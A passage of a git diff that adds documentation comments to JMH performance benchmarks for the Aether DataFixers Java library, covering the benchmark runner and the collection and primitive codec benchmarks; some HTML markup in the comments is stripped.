+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+/**
+ * Concurrency-focused JMH benchmarks for the Aether DataFixers framework.
+ *
+ * <p>This package contains benchmarks that measure performance characteristics under
+ * concurrent load. These benchmarks validate thread-safety of the DataFixer system,
+ * identify contention points, and quantify scalability across different thread counts.
+ *
+ * <p>Single-threaded benchmarks measure raw operation performance, but real-world
+ * applications often use the DataFixer system from multiple threads simultaneously.
+ * Concurrent benchmarks reveal:
+ *
+ * <ul>
+ *   <li><b>Lock contention:</b> Synchronization overhead in shared components</li>
+ *   <li><b>Cache coherency effects:</b> Performance impact of shared data access</li>
+ *   <li><b>Scalability limits:</b> Point at which adding threads stops improving throughput</li>
+ *   <li><b>Thread-safety validation:</b> Correctness under concurrent access</li>
+ * </ul>
+ *
+ * <p>The {@link de.splatgames.aether.datafixers.benchmarks.core core} package
+ * measures single-threaded baseline performance. Use concurrent benchmarks to:
+ *
+ * <ul>
+ *   <li><b>Calculate concurrency overhead:</b> {@code (single-threaded throughput × N threads) / actual throughput}</li>
+ *   <li><b>Identify scaling efficiency:</b> {@code actual throughput / (single-threaded throughput × N threads)}</li>
+ *   <li><b>Detect regression:</b> Compare concurrent results across code changes</li>
+ * </ul>
This class provides a convenient way to run benchmarks programmatically
- * with default settings optimized for comprehensive performance analysis.
+ *
This class provides both a command-line interface and programmatic API for
+ * executing benchmarks. It supports all standard JMH options while providing
+ * convenient preset configurations for common benchmark scenarios.
*
- * <h2>Usage</h2>
+ * <h2>Execution Methods</h2>
*
- * <h3>Via exec:java (Quick Development Runs)</h3>
+ * <h3>Via Maven exec:java (Development)</h3>
+ *
+ * <p>Quick way to run benchmarks during development without building a JAR:
*
 * <pre>{@code
 * # Run all benchmarks with default settings
 * mvn exec:java -pl aether-datafixers-benchmarks
 *
 * # Run with JMH arguments
 * mvn exec:java -pl aether-datafixers-benchmarks -Dexec.args="-h"
+ *
+ * # Run specific benchmark pattern
+ * mvn exec:java -pl aether-datafixers-benchmarks -Dexec.args="SingleFixBenchmark"
 * }</pre>
*
- *
Via Fat JAR (Production Runs)
+ *
Via Fat JAR (Production)
+ *
Recommended for production benchmark runs with full JMH isolation:
*
{@code
* # Build the fat JAR
* mvn clean package -pl aether-datafixers-benchmarks -DskipTests
@@ -60,47 +66,115 @@
* # Run with custom parameters
* java -jar target/*-benchmarks.jar -p payloadSize=LARGE -wi 3 -i 5 -f 1
*
- * # Output JSON results
+ * # Output JSON results for analysis
* java -jar target/*-benchmarks.jar -rf json -rff results.json
*
* # List all available benchmarks
* java -jar target/*-benchmarks.jar -l
+ *
+ * # Profile with async-profiler
+ * java -jar target/*-benchmarks.jar -prof async:output=flamegraph
* }
+ * <p>For integration with test frameworks or custom tooling:
+ *
+ * <pre>{@code
+ * // Run all benchmarks
+ * BenchmarkRunner.runAllBenchmarks();
+ *
+ * // Run quick validation (CI/CD)
+ * BenchmarkRunner.runQuickBenchmarks();
+ *
+ * // Run only core benchmarks
+ * BenchmarkRunner.runCoreBenchmarks();
+ *
+ * // Run only format benchmarks
+ * BenchmarkRunner.runFormatBenchmarks();
+ * }</pre>
*
 * <h2>Default Configuration</h2>
- *
- * <ul>
- *   <li>Warmup: 5 iterations, 1 second each</li>
- *   <li>Measurement: 10 iterations, 1 second each</li>
- *   <li>Forks: 2 (for statistical significance)</li>
- *   <li>JVM heap: 2GB min/max</li>
- * </ul>
+ *
+ * <table>
+ *   <tr><th>Setting</th><th>Default</th><th>Quick Mode</th></tr>
+ *   <tr><td>Warmup iterations</td><td>5</td><td>2</td></tr>
+ *   <tr><td>Measurement iterations</td><td>10</td><td>3</td></tr>
+ *   <tr><td>Forks</td><td>2</td><td>1</td></tr>
+ *   <tr><td>JVM heap</td><td>2 GB</td><td>1 GB</td></tr>
+ * </table>
+ *
+ * <h2>Common JMH Options</h2>
+ *
+ * <table>
+ *   <tr><th>Option</th><th>Description</th><th>Example</th></tr>
+ *   <tr><td>{@code -wi}</td><td>Warmup iterations</td><td>{@code -wi 3}</td></tr>
+ *   <tr><td>{@code -i}</td><td>Measurement iterations</td><td>{@code -i 5}</td></tr>
+ *   <tr><td>{@code -f}</td><td>Number of forks</td><td>{@code -f 1}</td></tr>
+ *   <tr><td>{@code -p}</td><td>Parameter value</td><td>{@code -p payloadSize=SMALL}</td></tr>
+ *   <tr><td>{@code -t}</td><td>Thread count</td><td>{@code -t 4}</td></tr>
+ *   <tr><td>{@code -rf}</td><td>Result format</td><td>{@code -rf json}</td></tr>
+ *   <tr><td>{@code -rff}</td><td>Result file</td><td>{@code -rff results.json}</td></tr>
+ *   <tr><td>{@code -l}</td><td>List benchmarks</td><td>{@code -l}</td></tr>
+ *   <tr><td>{@code -prof}</td><td>Profiler</td><td>{@code -prof gc}</td></tr>
+ * </table>
+ *
*
* @author Erik Pförtner
+ * @see de.splatgames.aether.datafixers.benchmarks.core
+ * @see de.splatgames.aether.datafixers.benchmarks.codec
+ * @see de.splatgames.aether.datafixers.benchmarks.concurrent
* @since 1.0.0
*/
public final class BenchmarkRunner {
+ /**
+ * Private constructor to prevent instantiation.
+ */
private BenchmarkRunner() {
// Main class
}
/**
- * Main entry point for running benchmarks.
+ * Main entry point for running benchmarks from the command line.
+ *
+ *
+ * <p>Behavior depends on whether arguments are provided:
+ *
+ * <ul>
+ *   <li><b>With arguments:</b> Delegates to JMH's main method, supporting all
+ *       standard JMH command-line options</li>
+ *   <li><b>Without arguments:</b> Runs all benchmarks using default configuration
+ *       via {@link #runAllBenchmarks()}</li>
+ * </ul>
*
- *
- * <p>When run without arguments, executes all benchmarks in the package.
- * Supports all standard JMH command-line arguments.
+ *
+ * <h2>Exit Codes</h2>
+ *
+ * <ul>
+ *   <li>{@code 0} - Successful completion</li>
+ *   <li>Non-zero - Error during benchmark execution</li>
+ * </ul>
*
- * @param args command-line arguments (passed to JMH)
+ * @param args command-line arguments (passed directly to JMH if present)
* @throws RunnerException if benchmark execution fails
- * @throws IOException if there is an I/O error
+ * @throws IOException if there is an I/O error reading benchmark metadata
*/
public static void main(final String[] args) throws RunnerException, IOException {
if (args.length > 0) {
@@ -113,9 +187,28 @@ public static void main(final String[] args) throws RunnerException, IOException
}
/**
- * Runs all benchmarks with default configuration.
+ * Runs all benchmarks in the benchmarks package with default configuration.
+ *
+ *
+ * <p>Executes every benchmark class in
+ * {@code de.splatgames.aether.datafixers.benchmarks.*} with production-quality
+ * settings suitable for reliable performance measurements.
+ *
+ * <h2>Configuration</h2>
+ *
+ * <ul>
+ *   <li>Warmup: 5 iterations</li>
+ *   <li>Measurement: 10 iterations</li>
+ *   <li>Forks: 2 (for JIT variance mitigation)</li>
+ *   <li>JVM heap: 2 GB min/max</li>
+ * </ul>
+ *
+ * <p><b>Note:</b> Running all benchmarks can take significant time depending
+ * on the number of parameter combinations. Consider using
+ * {@link #runQuickBenchmarks()} for validation or {@link #runCoreBenchmarks()}
+ * for focused testing.
*
* @throws RunnerException if benchmark execution fails
+ * @see #runQuickBenchmarks()
+ * @see #runCoreBenchmarks()
*/
public static void runAllBenchmarks() throws RunnerException {
final Options options = new OptionsBuilder()
@@ -130,11 +223,31 @@ public static void runAllBenchmarks() throws RunnerException {
}
/**
- * Runs a quick subset of benchmarks for validation.
+ * Runs a quick subset of benchmarks for fast validation.
*
- * <p>Useful for CI/CD pipelines or quick sanity checks.
+ * <p>Executes only the {@code SingleFixBenchmark} with minimal iterations,
+ * suitable for:
+ *
+ * <ul>
+ *   <li>CI/CD pipeline smoke tests</li>
+ *   <li>Quick sanity checks during development</li>
+ *   <li>Verifying benchmark infrastructure works correctly</li>
+ * </ul>
+ *
+ * <h2>Configuration</h2>
+ *
+ * <ul>
+ *   <li>Benchmark: SingleFixBenchmark only</li>
+ *   <li>Warmup: 2 iterations</li>
+ *   <li>Measurement: 3 iterations</li>
+ *   <li>Forks: 1 (faster but less statistically robust)</li>
+ *   <li>JVM heap: 1 GB min/max</li>
+ *   <li>Payload size: SMALL only</li>
+ * </ul>
+ *
+ * <p><b>Warning:</b> Results from quick benchmarks should not be used for
+ * performance comparisons due to reduced statistical rigor.
*
* @throws RunnerException if benchmark execution fails
+ * @see #runAllBenchmarks()
*/
public static void runQuickBenchmarks() throws RunnerException {
final Options options = new OptionsBuilder()
@@ -150,9 +263,30 @@ public static void runQuickBenchmarks() throws RunnerException {
}
/**
- * Runs core migration benchmarks only.
+ * Runs only the core migration benchmarks.
+ *
+ *
+ * <p>Executes benchmarks in the {@code core} package that measure DataFixer
+ * migration performance:
+ *
+ * <ul>
+ *   <li>{@code SingleFixBenchmark} - Single fix application performance</li>
+ * </ul>
+ *
+ * <p>Use this method when focusing on migration performance without
+ * format-specific or codec overhead considerations.
*
* @throws RunnerException if benchmark execution fails
+ * @see #runFormatBenchmarks()
+ * @see #runAllBenchmarks()
*/
public static void runCoreBenchmarks() throws RunnerException {
final Options options = new OptionsBuilder()
@@ -167,9 +301,31 @@ public static void runCoreBenchmarks() throws RunnerException {
}
/**
- * Runs format comparison benchmarks only.
+ * Runs only the format comparison benchmarks.
+ *
+ *
+ * <p>Executes benchmarks in the {@code format} package that compare different
+ * DynamicOps implementations:
+ *
+ * <ul>
+ *   <li>{@code JsonBenchmark} - GsonOps vs JacksonJsonOps</li>
+ *   <li>{@code YamlBenchmark} - SnakeYamlOps vs JacksonYamlOps</li>
+ *   <li>{@code TomlXmlBenchmark} - JacksonTomlOps and JacksonXmlOps</li>
+ *   <li>{@code CrossFormatBenchmark} - Format conversion performance</li>
+ * </ul>
+ *
+ * <h2>Configuration</h2>
+ *
+ * <ul>
+ *   <li>Warmup: 5 iterations</li>
+ *   <li>Measurement: 10 iterations</li>
+ *   <li>Forks: 2</li>
+ *   <li>JVM heap: 2 GB min/max</li>
+ * </ul>
+ *
+ * <p>Use this method when evaluating which DynamicOps implementation
+ * to use for a specific use case, or when optimizing format handling.
*
* @throws RunnerException if benchmark execution fails
+ * @see #runCoreBenchmarks()
+ * @see #runAllBenchmarks()
*/
public static void runFormatBenchmarks() throws RunnerException {
final Options options = new OptionsBuilder()
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
index a55b729..56405aa 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
@@ -49,10 +49,95 @@
/**
* JMH benchmark for collection codec encode/decode performance.
*
- *
Measures the performance of encoding and decoding lists of various sizes
- * using the {@link Codecs#list(Codec)} API.
+ *
+ * <p>Measures the performance of list codec operations with parameterized collection
+ * sizes. These benchmarks reveal how codec performance scales with data volume and
+ * help identify potential bottlenecks in collection traversal and element processing.
+ *
+ * <h2>Benchmark Categories</h2>
+ *
+ * <h3>String List Benchmarks</h3>
+ *
+ * <p>Measure {@code List<String>} codec operations:
+ *
+ * <ul>
+ *   <li>{@link #encodeStringList} - Encode string list to JSON array</li>
+ *   <li>{@link #decodeStringList} - Decode JSON array to string list</li>
+ *   <li>{@link #roundTripStringListDirect} - Complete round-trip with direct extraction</li>
+ *   <li>{@link #roundTripStringListFunctional} - Complete round-trip using functional API</li>
+ * </ul>
+ *
+ * <h3>Integer List Benchmarks</h3>
+ *
+ * <p>Measure {@code List<Integer>} codec operations:
+ *
+ * <ul>
+ *   <li>{@link #encodeIntList} - Encode integer list to JSON array</li>
+ *   <li>{@link #decodeIntList} - Decode JSON array to integer list</li>
+ *   <li>{@link #roundTripIntListDirect} - Complete round-trip with direct extraction</li>
+ *   <li>{@link #roundTripIntListFunctional} - Complete round-trip using functional API</li>
+ * </ul>
+ *
+ *
Parameters
+ *
+ *
Parameter
Values
Description
+ *
listSize
10, 100, 1000
Number of elements in the test list
+ *
+ *
+ *
Benchmark Configuration
+ *
+ *
Setting
Value
+ *
Warmup
5 iterations, 1 second each
+ *
Measurement
10 iterations, 1 second each
+ *
Forks
2 (for JIT variance mitigation)
+ *
JVM Heap
2 GB min/max
+ *
Time Unit
Microseconds (appropriate for collection operations)
+ *
+ *
+ *
Test Data Generation
+ *
+ *
Collection
Element Pattern
Example (size=3)
+ *
String List
{@code "item-" + index}
["item-0", "item-1", "item-2"]
+ *
Integer List
{@code index}
[0, 1, 2]
+ *
+ *
+ *
Interpreting Results
+ *
+ *
Linear scaling: Expected behavior where time scales proportionally with list size.
+ * If 100 elements takes 10x longer than 10 elements, scaling is linear.
+ *
Sub-linear scaling: Better than expected, may indicate JIT optimizations
+ * or efficient batch processing.
+ *
Super-linear scaling: Performance degrades faster than list size grows.
+ * May indicate memory pressure, GC overhead, or algorithmic inefficiency.
+ *
String vs Integer: String lists typically have higher overhead due to
+ * object allocation and potential string interning effects.
+ *
Direct vs Functional: Functional API (using {@code flatMap}) may show
+ * slight overhead from lambda creation and DataResult chaining.
+ *
+ *
+ *
Usage
+ *
{@code
+ * # Run all collection codec benchmarks
+ * java -jar benchmarks.jar CollectionCodecBenchmark
+ *
+ * # Run with specific list size
+ * java -jar benchmarks.jar CollectionCodecBenchmark -p listSize=1000
+ *
+ * # Run only string list benchmarks
+ * java -jar benchmarks.jar "CollectionCodecBenchmark.*String.*"
+ *
+ * # Run only encode benchmarks
+ * java -jar benchmarks.jar "CollectionCodecBenchmark.encode.*"
+ *
+ * # Compare direct vs functional round-trip
+ * java -jar benchmarks.jar "CollectionCodecBenchmark.roundTrip.*"
+ *
+ * # Quick validation run
+ * java -jar benchmarks.jar CollectionCodecBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Generate JSON report for analysis
+ * java -jar benchmarks.jar CollectionCodecBenchmark -rf json -rff collection_results.json
+ * }
*
* @author Erik Pförtner
+ * @see PrimitiveCodecBenchmark
+ * @see de.splatgames.aether.datafixers.api.codec.Codecs#list(Codec)
+ * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps
* @since 1.0.0
*/
@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
@@ -63,24 +148,89 @@
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
public class CollectionCodecBenchmark {
+ /**
+ * The number of elements in test lists, injected by JMH.
+ *
+ *
This parameter controls the size of both string and integer lists.
+ * Different sizes reveal scaling characteristics of the list codec:
+ *
+ *
10: Small list baseline, minimal memory/GC impact
+ *
100: Medium list, typical real-world collection size
+ *
1000: Large list stress test, reveals scaling behavior
+ *
+ */
@Param({"10", "100", "1000"})
private int listSize;
+ /**
+ * The DynamicOps implementation used for all codec operations.
+ *
+ *
GsonOps is used as the reference JSON implementation for benchmarks.
Creates list codecs by composing primitive codecs with {@link Codecs#list(Codec)}
+ *
Populates test lists with {@link #listSize} elements each
+ *
Pre-encodes both lists to JSON for decode benchmark isolation
+ *
+ *
+ *
Using {@link ArrayList} with pre-sized capacity avoids resizing overhead
+ * during population.
+ */
@Setup(Level.Trial)
public void setup() {
+ this.ops = GsonOps.INSTANCE;
+
this.stringListCodec = Codecs.list(Codecs.STRING);
this.intListCodec = Codecs.list(Codecs.INT);
- // Generate test data
this.stringList = new ArrayList<>(this.listSize);
this.intList = new ArrayList<>(this.listSize);
@@ -89,92 +239,168 @@ public void setup() {
this.intList.add(i);
}
- // Pre-encode for decode benchmarks
- this.encodedStringList = this.stringListCodec.encodeStart(GsonOps.INSTANCE, this.stringList)
+ this.encodedStringList = this.stringListCodec.encodeStart(this.ops, this.stringList)
.result().orElseThrow();
- this.encodedIntList = this.intListCodec.encodeStart(GsonOps.INSTANCE, this.intList)
+ this.encodedIntList = this.intListCodec.encodeStart(this.ops, this.intList)
.result().orElseThrow();
}
- // ==================== String List ====================
+ // ==================== String List Benchmarks ====================
/**
- * Benchmarks encoding a list of strings.
+ * Benchmarks string list encoding to JSON array.
+ *
+ *
Measures the performance of converting a {@code List} to a JSON
+ * array element. Each string element is individually encoded and added to the
+ * resulting array.
+ *
+ *
Performance factors:
+ *
+ *
List iteration overhead
+ *
Per-element string encoding cost
+ *
JSON array construction and element addition
+ *
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void encodeStringList(final Blackhole blackhole) {
- final DataResult result = this.stringListCodec.encodeStart(
- GsonOps.INSTANCE, this.stringList);
+ final DataResult<JsonElement> result = this.stringListCodec.encodeStart(this.ops, this.stringList);
blackhole.consume(result);
}
/**
- * Benchmarks decoding a list of strings.
+ * Benchmarks string list decoding from JSON array.
+ *
+ *
Measures the performance of extracting a {@code List} from a
+ * pre-encoded JSON array. Each array element is decoded to a string and
+ * collected into the result list.
+ *
+ *
Performance factors:
+ *
+ *
JSON array traversal
+ *
Per-element string extraction
+ *
Result list construction and population
+ *
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void decodeStringList(final Blackhole blackhole) {
- final DataResult, JsonElement>> result = this.stringListCodec.decode(
- GsonOps.INSTANCE, this.encodedStringList);
+ final DataResult<Pair<List<String>, JsonElement>> result = this.stringListCodec.decode(this.ops, this.encodedStringList);
blackhole.consume(result);
}
- // ==================== Integer List ====================
+ // ==================== Integer List Benchmarks ====================
/**
- * Benchmarks encoding a list of integers.
+ * Benchmarks integer list encoding to JSON array.
+ *
+ *
Measures the performance of converting a {@code List} to a JSON
+ * array element. Integer encoding is typically faster than string encoding
+ * due to simpler value representation.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void encodeIntList(final Blackhole blackhole) {
- final DataResult result = this.intListCodec.encodeStart(
- GsonOps.INSTANCE, this.intList);
+ final DataResult<JsonElement> result = this.intListCodec.encodeStart(this.ops, this.intList);
blackhole.consume(result);
}
/**
- * Benchmarks decoding a list of integers.
+ * Benchmarks integer list decoding from JSON array.
+ *
+ *
Measures the performance of extracting a {@code List} from a
+ * pre-encoded JSON array. Integer decoding involves numeric parsing from
+ * JSON number elements.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void decodeIntList(final Blackhole blackhole) {
- final DataResult, JsonElement>> result = this.intListCodec.decode(
- GsonOps.INSTANCE, this.encodedIntList);
+ final DataResult<Pair<List<Integer>, JsonElement>> result = this.intListCodec.decode(this.ops, this.encodedIntList);
blackhole.consume(result);
}
- // ==================== Round Trip ====================
+ // ==================== Round-Trip Benchmarks (Direct Style) ====================
+
+ /**
+ * Benchmarks complete string list round-trip with direct result extraction.
+ *
+ *
Measures the combined performance of encoding a {@code List} to JSON
+ * and immediately decoding it back. Uses {@code result().orElseThrow()} for
+ * direct value extraction, representing typical imperative usage patterns.
+ *
+ *
This benchmark is useful for scenarios where data is temporarily serialized
+ * (e.g., caching, message passing) and immediately deserialized.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void roundTripStringListDirect(final Blackhole blackhole) {
+ final JsonElement json = this.stringListCodec.encodeStart(this.ops, this.stringList)
+ .result().orElseThrow();
+ final Pair<List<String>, JsonElement> decoded = this.stringListCodec.decode(this.ops, json)
+ .result().orElseThrow();
+ blackhole.consume(decoded);
+ }
+
+ /**
+ * Benchmarks complete integer list round-trip with direct result extraction.
+ *
+ *
Measures the combined performance of encoding a {@code List} to JSON
+ * and immediately decoding it back using direct value extraction.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void roundTripIntListDirect(final Blackhole blackhole) {
+ final JsonElement json = this.intListCodec.encodeStart(this.ops, this.intList)
+ .result().orElseThrow();
+ final Pair<List<Integer>, JsonElement> decoded = this.intListCodec.decode(this.ops, json)
+ .result().orElseThrow();
+ blackhole.consume(decoded);
+ }
+
+ // ==================== Round-Trip Benchmarks (Functional Style) ====================
/**
- * Benchmarks round-trip encoding and decoding of a string list.
+ * Benchmarks complete string list round-trip using functional API.
+ *
+ *
Measures the combined performance of encoding and decoding using
+ * {@link DataResult#flatMap} for monadic composition. This represents
+ * the functional programming style where operations are chained without
+ * explicit result unwrapping.
+ *
+ *
Comparing with {@link #roundTripStringListDirect} reveals the overhead
+ * (if any) of the functional API approach versus direct extraction.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void roundTripStringList(final Blackhole blackhole) {
- final DataResult encoded = this.stringListCodec.encodeStart(
- GsonOps.INSTANCE, this.stringList);
+ public void roundTripStringListFunctional(final Blackhole blackhole) {
+ final DataResult<JsonElement> encoded = this.stringListCodec.encodeStart(this.ops, this.stringList);
final DataResult<Pair<List<String>, JsonElement>> decoded = encoded.flatMap(
- json -> this.stringListCodec.decode(GsonOps.INSTANCE, json));
+ json -> this.stringListCodec.decode(this.ops, json)
+ );
blackhole.consume(decoded);
}
/**
- * Benchmarks round-trip encoding and decoding of an integer list.
+ * Benchmarks complete integer list round-trip using functional API.
+ *
+ *
Measures the combined performance of encoding and decoding using
+ * monadic composition via {@link DataResult#flatMap}.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void roundTripIntList(final Blackhole blackhole) {
- final DataResult encoded = this.intListCodec.encodeStart(
- GsonOps.INSTANCE, this.intList);
+ public void roundTripIntListFunctional(final Blackhole blackhole) {
+ final DataResult<JsonElement> encoded = this.intListCodec.encodeStart(this.ops, this.intList);
final DataResult<Pair<List<Integer>, JsonElement>> decoded = encoded.flatMap(
- json -> this.intListCodec.decode(GsonOps.INSTANCE, json));
+ json -> this.intListCodec.decode(this.ops, json)
+ );
blackhole.consume(decoded);
}
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
index ad44bd4..7e9c8da 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
@@ -43,12 +43,102 @@
import java.util.concurrent.TimeUnit;
/**
- * JMH benchmark for primitive codec encode/decode performance.
+ * JMH benchmark for primitive type codec encode/decode performance.
*
- *
Measures the performance of encoding and decoding primitive types
- * using the {@link Codecs} API.
+ *
Measures the baseline performance of the fundamental codec operations for
+ * primitive Java types. These benchmarks establish the lower bound for codec
+ * performance and help identify overhead introduced by more complex codec
+ * compositions.
+ *
+ *
Benchmark Categories
+ *
+ *
Encode Benchmarks
+ *
Measure Java value to JSON element conversion:
+ *
+ *
{@link #encodeBool} - Boolean encoding
+ *
{@link #encodeInt} - Integer encoding
+ *
{@link #encodeLong} - Long encoding
+ *
{@link #encodeFloat} - Float encoding
+ *
{@link #encodeDouble} - Double encoding
+ *
{@link #encodeString} - String encoding
+ *
+ *
+ *
Decode Benchmarks
+ *
Measure JSON element to Java value conversion:
+ *
+ *
{@link #decodeBool} - Boolean decoding
+ *
{@link #decodeInt} - Integer decoding
+ *
{@link #decodeLong} - Long decoding
+ *
{@link #decodeFloat} - Float decoding
+ *
{@link #decodeDouble} - Double decoding
+ *
{@link #decodeString} - String decoding
+ *
+ *
+ *
Round-Trip Benchmarks
+ *
Measure complete encode-then-decode cycles:
+ *
+ *
{@link #roundTripIntDirect} - Integer round-trip with direct result extraction
+ *
{@link #roundTripStringDirect} - String round-trip with direct result extraction
+ *
+ *
+ *
Benchmark Configuration
+ *
+ *
Setting
Value
+ *
Warmup
5 iterations, 1 second each
+ *
Measurement
10 iterations, 1 second each
+ *
Forks
2 (for JIT variance mitigation)
+ *
JVM Heap
2 GB min/max
+ *
Time Unit
Nanoseconds (for fine-grained primitive ops)
+ *
+ *
+ *
Test Values
+ *
+ *
Type
Value
Notes
+ *
boolean
{@code true}
Single bit representation
+ *
int
{@code 42}
Small positive integer
+ *
long
{@code 123456789L}
Value exceeding int range representation
+ *
float
{@code 3.14159f}
Pi approximation (tests decimal handling)
+ *
double
{@code 2.718281828}
Euler's number (tests precision)
+ *
String
{@code "benchmark-test-string"}
21-character ASCII string
+ *
+ *
+ *
Interpreting Results
+ *
+ *
Encode vs Decode: Encoding typically allocates new JSON elements; decoding
+ * extracts values from existing elements. Similar performance is expected.
+ *
Numeric types: All numeric types should have similar performance as they
+ * map directly to JSON number primitives.
+ *
String codec: May show slightly different characteristics due to string
+ * interning and character encoding considerations.
+ *
Round-trip overhead: Should be approximately encode + decode time plus
+ * minimal DataResult unwrapping overhead.
*
* @author Erik Pförtner
+ * @see CollectionCodecBenchmark
+ * @see de.splatgames.aether.datafixers.api.codec.Codecs
+ * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps
* @since 1.0.0
*/
@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
@@ -59,131 +149,319 @@
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
public class PrimitiveCodecBenchmark {
- // Test values
+ /**
+ * Test boolean value for encoding benchmarks.
+ */
private static final boolean TEST_BOOL = true;
+
+ /**
+ * Test integer value for encoding benchmarks.
+ *
+ *
A small positive integer that fits in a single JSON number token.
+ */
private static final int TEST_INT = 42;
+
+ /**
+ * Test long value for encoding benchmarks.
+ *
+ *
A value that exceeds typical int range to test long-specific handling.
+ */
private static final long TEST_LONG = 123456789L;
+
+ /**
+ * Test float value for encoding benchmarks.
+ *
+ *
Pi approximation to test decimal point handling and precision.
+ */
private static final float TEST_FLOAT = 3.14159f;
+
+ /**
+ * Test double value for encoding benchmarks.
+ *
+ *
Euler's number with extended precision to test double encoding accuracy.
+ */
private static final double TEST_DOUBLE = 2.718281828;
+
+ /**
+ * Test string value for encoding benchmarks.
+ *
+ *
A 21-character ASCII string representing typical field values.
+ */
private static final String TEST_STRING = "benchmark-test-string";
- // Pre-encoded values for decode benchmarks
+ /**
+ * The DynamicOps implementation used for all codec operations.
+ *
+ *
GsonOps is used as the reference implementation for JSON format benchmarks.
+ */
+ private GsonOps ops;
+
+ /**
+ * Pre-encoded boolean JSON element for decode benchmarks.
+ */
private JsonElement encodedBool;
+
+ /**
+ * Pre-encoded integer JSON element for decode benchmarks.
+ */
private JsonElement encodedInt;
+
+ /**
+ * Pre-encoded long JSON element for decode benchmarks.
+ */
private JsonElement encodedLong;
+
+ /**
+ * Pre-encoded float JSON element for decode benchmarks.
+ */
private JsonElement encodedFloat;
+
+ /**
+ * Pre-encoded double JSON element for decode benchmarks.
+ */
private JsonElement encodedDouble;
+
+ /**
+ * Pre-encoded string JSON element for decode benchmarks.
+ */
private JsonElement encodedString;
+ /**
+ * Initializes pre-encoded JSON elements for decode benchmarks.
+ *
+ *
Pre-encoding ensures decode benchmarks measure only decoding performance
+ * without encoding overhead. All test values are encoded once at trial start.
Measures the performance of converting a Java {@code boolean} to a
+ * JSON boolean element via {@link Codecs#BOOL}.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void encodeBool(final Blackhole blackhole) {
- final DataResult result = Codecs.BOOL.encodeStart(GsonOps.INSTANCE, TEST_BOOL);
+ final DataResult<JsonElement> result = Codecs.BOOL.encodeStart(this.ops, TEST_BOOL);
blackhole.consume(result);
}
+ /**
+ * Benchmarks boolean value decoding from JSON.
+ *
+ *
Measures the performance of extracting a Java {@code Boolean} from a
+ * pre-encoded JSON boolean element.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void decodeBool(final Blackhole blackhole) {
- final DataResult> result = Codecs.BOOL.decode(GsonOps.INSTANCE, this.encodedBool);
+ final DataResult<Pair<Boolean, JsonElement>> result = Codecs.BOOL.decode(this.ops, this.encodedBool);
blackhole.consume(result);
}
- // ==================== Integer ====================
+ // ==================== Integer Benchmarks ====================
+ /**
+ * Benchmarks integer value encoding to JSON.
+ *
+ *
Measures the performance of converting a Java {@code int} to a
+ * JSON number element via {@link Codecs#INT}.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void encodeInt(final Blackhole blackhole) {
- final DataResult result = Codecs.INT.encodeStart(GsonOps.INSTANCE, TEST_INT);
+ final DataResult<JsonElement> result = Codecs.INT.encodeStart(this.ops, TEST_INT);
blackhole.consume(result);
}
+ /**
+ * Benchmarks integer value decoding from JSON.
+ *
+ *
Measures the performance of extracting a Java {@code Integer} from a
+ * pre-encoded JSON number element.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void decodeInt(final Blackhole blackhole) {
- final DataResult> result = Codecs.INT.decode(GsonOps.INSTANCE, this.encodedInt);
+ final DataResult<Pair<Integer, JsonElement>> result = Codecs.INT.decode(this.ops, this.encodedInt);
blackhole.consume(result);
}
- // ==================== Long ====================
+ // ==================== Long Benchmarks ====================
+ /**
